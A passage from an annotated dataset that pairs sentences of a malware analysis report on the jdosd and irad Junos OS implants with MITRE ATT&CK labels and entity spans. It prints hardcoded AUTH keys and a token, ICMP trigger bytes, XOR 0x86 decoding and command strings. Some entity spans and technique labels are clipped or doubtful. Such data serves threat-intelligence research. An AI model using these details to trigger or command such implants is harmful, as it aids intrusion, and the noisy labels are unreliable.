and value \\xff", "entities": [ { "text": "Header Payload Value \"deadbeef\"", "start": 20, "end": 51, "label": "Infrastructure_Indicator" }, { "text": " Payload Value", "start": 26, "end": 40, "label": "Infrastructure_Indicator" }, { "text": "\\xff", "start": 73, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "jdosd implant", "start": 122, "end": 135, "label": "MalwareTool" }, { "text": "get_server_hello()", "start": 153, "end": 171, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p13-s213-8de11b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 13, "sentence_id": 213, "context_before": "Packet Format\nField Header Payload Value \"deadbeef\" + Non-negative value \\xff Call Graphs The various call graphs for the jdosd implant are given below.\nget_server_hello()", "sentence_text": "send_client_hello()\nprocess_commands()", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "C2 functions: send_client_hello(), process_commands()", "entities": [ { "text": "send_client_hello()", "start": 0, "end": 19, "label": "MalwareTool" }, { "text": "process_commands()", "start": 20, "end": 38, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p14-s214-29a1a1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 214, "context_before": "send_client_hello()\nprocess_commands()", "sentence_text": "Protocol Diagram\nThe jdosd C2 protocol is relatively simple compared to the other implants described by this document.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p14-s215-81678a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 215, "context_before": "Protocol Diagram\nThe jdosd C2 protocol is relatively simple compared to the other implants described by this document.", "sentence_text": "The jdosd implements a simplistic client/server hello mechanism after which it becomes ready to start receiving commands.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Implements client/server hello mechanism for C2", "entities": [ { "text": "ready to start receiving commands.", "start": 87, "end": 121, "label": "Action" }, { "text": "mplements a simplistic client/server hello mechanism", "start": 11, "end": 63, "label": "Action" }, { "text": " jdosd", "start": 3, "end": 9, "label": "MalwareTool" }, { "text": " jdosd", "start": 3, "end": 9, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p14-s216-7a5072", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 216, "context_before": "The jdosd implements a simplistic client/server hello mechanism after which it becomes ready to start receiving commands.", "sentence_text": "The protocol can be understood from the diagram below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p14-s217-b6a5d4", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 217, "context_before": "The protocol can be understood from the diagram below.", "sentence_text": "Junos OS Specific Actions The jdosd implant does not seem to perform any Junos OS specific actions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p14-s218-19d3ad", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 218, "context_before": "Junos OS Specific Actions The jdosd implant does not seem to perform any Junos OS specific actions.", "sentence_text": "This seems to be a generic Remote Access Toolkit.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Generic Remote Access Toolkit functionality", "entities": [ { "text": "Remote Access Toolkit.", "start": 27, "end": 49, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p14-s219-5bab62", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 219, "context_before": "This seems to be a generic Remote Access Toolkit.", "sentence_text": "Internet Remote Access Daemon (irad)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Internet Remote Access Daemon (irad) deployment", "entities": [ { "text": "Internet Remote Access Daemon (irad)", "start": 0, "end": 36, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p14-s220-70bde9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 220, "context_before": "Internet Remote Access Daemon (irad)", "sentence_text": "The Internet Remote Access Daemon (irad) is a more complex Remote Access Toolkit (RAT).", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "Complex RAT - Internet Remote Access Daemon (irad)", "entities": [ { "text": "Remote Access Toolkit (RAT).", "start": 59, "end": 87, "label": "MalwareTool" }, { "text": "nternet Remote Access Daemon (irad)", "start": 5, "end": 40, "label": "MalwareTool" } ] }, { "uid": "mitre-95_mitre_report-p14-s221-5b8462", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 221, "context_before": "The Internet Remote Access Daemon (irad) is a more complex Remote Access Toolkit (RAT).", "sentence_text": "This implant has a more sophisticated activation logic and also implements some customized ciphers and hashing algorithms.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Sophisticated activation logic with custom ciphers and hashing", "entities": [ { "text": "implant", "start": 5, "end": 12, "label": "MalwareTool" }, { "text": "sophisticated activation logic", "start": 24, "end": 54, "label": "Action" }, { "text": "implements some customized ciphers and hashing algorithms", "start": 64, "end": 121, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p14-s222-da795e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 222, "context_before": "This implant has a more sophisticated activation logic and also implements some customized ciphers and hashing algorithms.", "sentence_text": "The request and response protocol for irad uses authenticated encryption (encrypted data and MAC) instead of simple encryption as seen in lmpad and jdosd.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses authenticated encryption with MAC for C2 protocol", "entities": [ { "text": "irad ", "start": 38, "end": 43, "label": "MalwareTool" }, { "text": "jdosd", "start": 148, "end": 153, "label": "MalwareTool" }, { "text": "lmpad", "start": 138, "end": 143, "label": "MalwareTool" }, { "text": "authenticated encryption (encrypted data and MAC)", "start": 48, "end": 97, "label": "Action" }, { "text": "request and response protocol", "start": 4, "end": 33, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p14-s223-a3191f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 14, "sentence_id": 223, "context_before": "The request and response protocol for irad uses authenticated encryption (encrypted data and MAC) instead of simple encryption as seen in lmpad and jdosd.", "sentence_text": "However, there is no evidence to suggest that this is a targeted Junos OS implant.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p15-s224-8e9457", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 224, "context_before": "However, there is no evidence to suggest that this is a targeted Junos OS implant.", "sentence_text": "Executable File Details Title Description File Name irad File Path /usr/sbin/irad File Type irad: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped File Size 1465100 bytes SHA1 Hash 1a6d07da7e77a5706dd8af899ebe4daa74bbbe91 SHA256 Hash 5bef7608d66112315eefff354dae42f49178b7498f994a728ae6203a8a59f5a2 ssdeep hash 24576:", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "irad implant deployment with file details and hashes", "entities": [ { "text": "irad", "start": 52, "end": 56, "label": "MalwareTool" }, { "text": "/usr/sbin/irad", "start": 67, "end": 81, "label": "Infrastructure_Indicator" }, { "text": "ELF 32-bit LSB executable,", "start": 98, "end": 124, "label": "Infrastructure_Indicator" }, { "text": "FreeBSD 6.4,", "start": 217, "end": 229, "label": "Infrastructure_Indicator" }, { "text": "Hash 1a6d07da7e77a5706dd8af899ebe4daa74bbbe91", "start": 268, "end": 313, "label": "Infrastructure_Indicator" }, { "text": "Hash 5bef7608d66112315eefff354dae42f49178b7498f994a728ae6203a8a59f5a2", "start": 321, "end": 390, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p15-s225-45e275", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 225, "context_before": "Executable File Details Title Description File Name irad File Path /usr/sbin/irad File Type irad: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 6.4, stripped File Size 1465100 bytes SHA1 Hash 1a6d07da7e77a5706dd8af899ebe4daa74bbbe91 SHA256 Hash 5bef7608d66112315eefff354dae42f49178b7498f994a728ae6203a8a59f5a2 ssdeep hash 24576:", "sentence_text": "rJEh61p/uG2ApVStdIGd+7A8C6Vrykdk7X:uqp/uGVvSns86hykyb Implant Analysis Like jdosd the irad implant reads the interface name stored in the eth environment variable.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "irad reads interface name from eth environment variable", "entities": [ { "text": "irad implant", "start": 86, "end": 98, "label": "MalwareTool" }, { "text": "jdosd ", "start": 76, "end": 82, "label": "MalwareTool" }, { "text": "reads the interface name", "start": 99, "end": 123, "label": "Action" }, { "text": "the eth environment variable", "start": 134, "end": 162, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p15-s226-0c5ec8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 226, "context_before": "rJEh61p/uG2ApVStdIGd+7A8C6Vrykdk7X:uqp/uGVvSns86hykyb Implant Analysis Like jdosd the irad implant reads the interface name stored in the eth environment variable.", "sentence_text": "This interface is used in a slightly different way.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p15-s227-866126", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 227, "context_before": "This interface is used in a slightly different way.", "sentence_text": "The implant has a complex activation logic, which is explained below.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p15-s228-7744b0", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 228, "context_before": "The implant has a complex activation logic, which is explained below.", "sentence_text": "Artifacts Found\nArtifact Name Description", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p15-s229-cd0201", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 229, "context_before": "Artifacts Found\nArtifact Name Description", "sentence_text": "AUTH Key A hardcoded AUTH key was found at offset 0xc8a0 in the irad binary with value WZtOTig2m42gXB6U AUTH Key 2 A hardcoded AUTH key was found at offset 0xc920 in the irad binary with value fb-75c043b82127 AUTH Token", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses multiple hardcoded AUTH keys for C2 communication", "entities": [ { "text": "irad binary", "start": 64, "end": 75, "label": "MalwareTool" }, { "text": "AUTH Token", "start": 209, "end": 219, "label": "Infrastructure_Indicator" }, { "text": "alue WZtOTig2m42gXB6U AUTH", "start": 82, "end": 108, "label": "Infrastructure_Indicator" }, { "text": "fb-75c043b82127 ", "start": 193, "end": 209, "label": "Infrastructure_Indicator" }, { "text": "offset 0xc920", "start": 149, "end": 162, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p15-s230-36589d", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 230, "context_before": "AUTH Key A hardcoded AUTH key was found at offset 0xc8a0 in the irad binary with value WZtOTig2m42gXB6U AUTH Key 2 A hardcoded AUTH key was found at offset 0xc920 in the irad binary with value fb-75c043b82127 AUTH Token", "sentence_text": "A hardcoded AUTH token was found at offset 0xa00c in the irad binary with value \\x58\\x90\\xae\\x86\\xf1\\xb9\\x1c\\xf6\\x29\\x83\\x95\\x71\\x1d\\xde\\x58\\x0d", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses hardcoded AUTH token with hex values for C2", "entities": [ { "text": "irad binary", "start": 57, "end": 68, "label": "MalwareTool" }, { "text": "AUTH token", "start": 12, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "\\x58\\x90\\xae\\x86\\xf1\\xb9\\x1c\\xf6\\x29\\x83\\x95\\x71\\x1d\\xde\\x58\\x0d", "start": 80, "end": 144, "label": "Infrastructure_Indicator" }, { "text": "offset 0xa00c i", "start": 36, "end": 51, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p15-s232-4f22ed", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 232, "context_before": "Encode Key(s)", "sentence_text": "Multiple encoding keys were found in the irad binary Decode Key(s)", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Uses multiple encode/decode keys for C2 encryption", "entities": [ { "text": "irad binary", "start": 41, "end": 52, "label": "MalwareTool" }, { "text": "Multiple encoding keys", "start": 0, "end": 22, "label": "Infrastructure_Indicator" }, { "text": "Decode Key(s)", "start": 53, "end": 66, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p15-s233-80e0a1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 233, "context_before": "Multiple encoding keys were found in the irad binary Decode Key(s)", "sentence_text": "Multiple decoding keys were found in the irad binary irad Activation Details On reading the interface value from the eth environment variable, the irad implant initiates a packet capture on this interface with a filter to look for ICMP packets which contain the two bytes \\xaa\\x56 at offset 4.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" }, { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Packet capture on interface for ICMP packets with specific bytes \\xaa\\x56 at offset 4", "entities": [ { "text": "irad implant", "start": 147, "end": 159, "label": "MalwareTool" }, { "text": "filter to look for", "start": 212, "end": 230, "label": "Action" }, { "text": "initiates a packet capture", "start": 160, "end": 186, "label": "Action" }, { "text": "bytes \\xaa\\x56 at offset 4.", "start": 266, "end": 293, "label": "Infrastructure_Indicator" }, { "text": "ICMP packets", "start": 231, "end": 243, "label": "Infrastructure_Indicator" }, { "text": "eth environment variable,", "start": 117, "end": 142, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p15-s234-278db5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 15, "sentence_id": 234, "context_before": "Multiple decoding keys were found in the irad binary irad Activation Details On reading the interface value from the eth environment variable, the irad implant initiates a packet capture on this interface with a filter to look for ICMP packets which contain the two bytes \\xaa\\x56 at offset 4.", "sentence_text": "This is achieved as follows:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p16-s236-aec461", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 16, "sentence_id": 236, "context_before": "/*\n*", "sentence_text": "The interface name is stored in the interface_name argument to this * function.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p16-s237-a1c67a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 16, "sentence_id": 237, "context_before": "The interface name is stored in the interface_name argument to this * function.", "sentence_text": "if (debug != 0) { pcap_perror(packet_capture,\"pcap_compile\");\n}\nexit(0);\n}\n/*", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p16-s238-5ed788", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 16, "sentence_id": 238, "context_before": "if (debug != 0) { pcap_perror(packet_capture,\"pcap_compile\");\n}\nexit(0);\n}\n/*", "sentence_text": "The correct control packet should have a length greater than 35 bytes and must not have a NULL value for the packet_data.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "Validates control packets >35 bytes with non-NULL data", "entities": [ { "text": "must not have a NULL ", "start": 74, "end": 95, "label": "Action" }, { "text": "control packet should have a length greater than 35 bytes", "start": 12, "end": 69, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p16-s239-c7f853", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 16, "sentence_id": 239, "context_before": "The correct control packet should have a length greater than 35 bytes and must not have a NULL value for the packet_data.", "sentence_text": "This is ensured as follows:\ndo {\ndo {\npacket_data = (uint *)pcap_next(packet_capture, packet_header);\n} while (packet_data == (uint *)0x0);\n} while (*(uint *)((int)packet_header + 0xc) < 0x23);", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "Packet capture loop validating packet length >35 bytes and non-NULL data", "entities": [ { "text": "pcap_next(packet_capture, packet_header);", "start": 60, "end": 101, "label": "Action" }, { "text": "packet_data", "start": 38, "end": 49, "label": "Action" }, { "text": "while (*(uint *)((int)packet_header + 0xc) < 0x23);", "start": 142, "end": 193, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p16-s240-91f93e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 16, "sentence_id": 240, "context_before": "This is ensured as follows:\ndo {\ndo {\npacket_data = (uint *)pcap_next(packet_capture, packet_header);\n} while (packet_data == (uint *)0x0);\n} while (*(uint *)((int)packet_header + 0xc) < 0x23);", "sentence_text": "Once such a packet is received, the actual payload of the packet is extracted from packet_data.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "Extract payload from validated ICMP packet", "entities": [ { "text": "packet_data.", "start": 83, "end": 95, "label": "Infrastructure_Indicator" }, { "text": "payload of the packet is extracted", "start": 43, "end": 77, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p16-s241-843f07", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 16, "sentence_id": 241, "context_before": "Once such a packet is received, the actual payload of the packet is extracted from packet_data.", "sentence_text": "This is a control packet, and further sections will describe what actions the irad should take depending on the contents of this packet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p16-s242-fd327a", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 16, "sentence_id": 242, "context_before": "This is a control packet, and further sections will describe what actions the irad should take depending on the contents of this packet.", "sentence_text": "The packet body is then extracted from this payload by multiplying the lower 4 bits of the packet payload by 4.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Extract packet body by multiplying lower 4 bits by 4", "entities": [ { "text": "packet body is then extracted", "start": 4, "end": 33, "label": "Action" }, { "text": " multiplying the lower 4 bits of the packet payload by 4.", "start": 54, "end": 111, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p16-s243-43c67e", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 16, "sentence_id": 243, "context_before": "The packet body is then extracted from this payload by multiplying the lower 4 bits of the packet payload by 4.", "sentence_text": "The packet body will look something like the following:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p17-s244-f4f98b", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 244, "context_before": "The packet body will look something like the following:", "sentence_text": "The first 10 bytes of the packet body contain the packet type.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "First 10 bytes of packet body contain packet type", "entities": [ { "text": "first 10 bytes of the packet body", "start": 4, "end": 37, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s245-3d45d8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 245, "context_before": "The first 10 bytes of the packet body contain the packet type.", "sentence_text": "This is extracted by reading the value at the 8th byte of the packet body, XORing it with 0x86 and subtracting 0x30 from it.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Extract packet type using XOR and subtraction operations", "entities": [ { "text": "XORing it with 0x86", "start": 75, "end": 94, "label": "Action" }, { "text": "subtracting 0x30 from it", "start": 99, "end": 123, "label": "Action" }, { "text": "8th byte of the packet body", "start": 46, "end": 73, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s246-0d7e1c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 246, "context_before": "This is extracted by reading the value at the 8th byte of the packet body, XORing it with 0x86 and subtracting 0x30 from it.", "sentence_text": "The following two packet types have been identified:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p17-s247-e91f7c", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 247, "context_before": "The following two packet types have been identified:", "sentence_text": "Type Value Server Mode 0", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Server Mode packet type with value 0", "entities": [ { "text": "Type Value Server Mode 0", "start": 0, "end": 24, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s248-dcefa2", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 248, "context_before": "Type Value Server Mode 0", "sentence_text": "Server Mode 1 or 2 Client Mode", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Server Mode 1 or 2 and Client Mode packet types", "entities": [ { "text": "Server Mode 1 or 2 Client Mode", "start": 0, "end": 30, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s249-262064", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 249, "context_before": "Server Mode 1 or 2 Client Mode", "sentence_text": "Two packet actions have been identified:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p17-s250-3c1492", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 250, "context_before": "Two packet actions have been identified:", "sentence_text": "Action String Action uSarguuS62bKRA0J Start in Server or Client mode 1spCq0BMbJwCoeZn Kill local irad server If the irad implant is meant to operate in a client mode, the bytes 27-30 contain 4 octets of an IPv4 address in an encoded form.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1102", "name": "Web Service" }, { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Start in Server/Client mode or kill local irad server with encoded IPv4 address", "entities": [ { "text": "irad implant", "start": 116, "end": 128, "label": "MalwareTool" }, { "text": "Kill local irad server ", "start": 86, "end": 109, "label": "Action" }, { "text": "Start in Server or Client mode", "start": 38, "end": 68, "label": "Action" }, { "text": "bytes 27-30 contain 4 octets of an IPv4 ", "start": 171, "end": 211, "label": "Infrastructure_Indicator" }, { "text": "encoded form.", "start": 225, "end": 238, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s251-201f7f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 251, "context_before": "Action String Action uSarguuS62bKRA0J Start in Server or Client mode 1spCq0BMbJwCoeZn Kill local irad server If the irad implant is meant to operate in a client mode, the bytes 27-30 contain 4 octets of an IPv4 address in an encoded form.", "sentence_text": "Each of these bytes are XORed with 0x86 to obtain the actual octet value.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "XOR IPv4 address bytes with 0x86 to decode actual values", "entities": [ { "text": "XORed with 0x86", "start": 24, "end": 39, "label": "Action" }, { "text": "actual octet value.", "start": 54, "end": 73, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s252-64c363", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 252, "context_before": "Each of these bytes are XORed with 0x86 to obtain the actual octet value.", "sentence_text": "After this, the next 5 bytes contain the port number to connect to in a string format.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Next 5 bytes contain port number in string format", "entities": [ { "text": "string format.", "start": 72, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "next 5 bytes contain the port number", "start": 16, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s253-f87e06", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 253, "context_before": "After this, the next 5 bytes contain the port number to connect to in a string format.", "sentence_text": "This string is also encoded in a similar way to the IP address octets and each byte of this string must be XORed with 0x86 to obtain the port value.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p17-s254-82ac10", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 254, "context_before": "This string is also encoded in a similar way to the IP address octets and each byte of this string must be XORed with 0x86 to obtain the port value.", "sentence_text": "Once both values are obtained the client mode irad process connects to this address over a TCP socket, authenticates the C2 and starts processing commands.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071", "name": "Application Layer Protocol" } ], "procedure": "Client process connects to C2 server via TCP, authenticates, and executes received commands.", "entities": [ { "text": "client mode irad process", "start": 34, "end": 58, "label": "MalwareTool" }, { "text": "connects to this address over a TCP socket", "start": 59, "end": 101, "label": "Action" }, { "text": "authenticates the C2", "start": 103, "end": 123, "label": "Action" }, { "text": "starts processing commands", "start": 128, "end": 154, "label": "Action" } ] }, { "uid": "mitre-95_mitre_report-p17-s255-41774f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 255, "context_before": "Once both values are obtained the client mode irad process connects to this address over a TCP socket, authenticates the C2 and starts processing commands.", "sentence_text": "Authentication Protocol Details", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p17-s256-91b6f9", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 256, "context_before": "Authentication Protocol Details", "sentence_text": "The authentication protocol is simple:\n1.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p17-s257-ed3f8f", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 257, "context_before": "The authentication protocol is simple:\n1.", "sentence_text": "Read 40 bytes from the connected socket.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-95_mitre_report-p17-s258-a8bcb1", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 258, "context_before": "Read 40 bytes from the connected socket.", "sentence_text": "Using a custom key derivation function generate a 165-byte encoding key 4.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Generate 165-byte encoding key using custom KDF", "entities": [ { "text": "generate a 165-byte encoding key 4.", "start": 39, "end": 74, "label": "Action" }, { "text": "encoding key 4.", "start": 59, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "custom key derivation function", "start": 8, "end": 38, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s259-112ed8", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 259, "context_before": "Using a custom key derivation function generate a 165-byte encoding key 4.", "sentence_text": "Using this key receive and decode the next 16 bytes from the server.\n5.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Receive and decode 16 bytes from server using encoding key", "entities": [ { "text": "receive and decode the next 16 bytes", "start": 15, "end": 51, "label": "Action" }, { "text": "from the server", "start": 52, "end": 67, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s260-be50b5", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 260, "context_before": "Using this key receive and decode the next 16 bytes from the server.\n5.", "sentence_text": "Compare this decoded value to the hardcoded AUTH token.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" } ], "procedure": "Compare decoded value to hardcoded AUTH token", "entities": [ { "text": "Compare this decoded value", "start": 0, "end": 26, "label": "Action" }, { "text": "hardcoded AUTH token.", "start": 34, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-95_mitre_report-p17-s261-50cc98", "source": "mitre", "doc_id": "95_mitre_report", "page_number": 17, "sentence_id": 261, "context_before": "Compare this decoded value to the hardcoded AUTH token.", "sentence_text": "Encode and send the same AUTH token back.", 